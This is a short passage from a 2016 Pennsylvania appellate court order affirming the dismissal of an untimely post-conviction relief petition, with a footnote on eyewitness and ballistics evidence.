defendant seeking a new trial must demonstrate he will not use the alleged
after-discovered evidence solely to impeach the credibility of a witness”).
Accordingly, because Appellant has not established any of the
timeliness exceptions to the PCRA time-bar, the PCRA court lacked
jurisdiction to address his claim, and we affirm the dismissal of Appellant's
instant untimely PCRA petition.
Order Affirmed.
Judgment Entered.
Joseph D. Seletyn, Esq.
Prothonotary
Date: 10/21/2016
____________________________________________
6
In addition, another eyewitness, Danny Gissentanner, unequivocally
identified Appellant as one of the shooters at Appellant’s trial, and his
testimony was corroborated by ballistics evidence.
- 11 -
|